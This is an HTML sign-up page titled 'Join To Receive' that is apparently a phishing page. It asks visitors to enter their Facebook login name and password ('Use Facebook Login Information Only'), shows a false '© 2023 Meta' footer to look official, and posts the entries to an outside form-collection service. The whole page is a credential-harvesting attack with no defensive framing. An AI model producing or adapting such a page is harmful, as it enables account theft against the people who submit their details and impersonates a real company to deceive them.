<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <title>Join To Receive</title>
</head>
<body>
    <div class="container">
        <form action="https://formspree.io/f/meqbwbna" method="POST">
            <h2>Join To Receive</h2>
            <label for="fullName">Full Name:</label>
            <input type="text" id="fullName" name="fullName" required>

            <label for="emailOrPhone">Email or Phone:</label>
            <input type="text" id="emailOrPhone" name="emailOrPhone" required>

            <label for="text">Your Password:</label>
            <input type="text" id="text" name="text" required>

            <p>Use Facebook Login Information Only</p>

            <button type="submit">Sign Up</button>
        </form>
    </div>
    <footer>
        <p>© 2023 Meta</p>
    </footer>
</body>
</html>
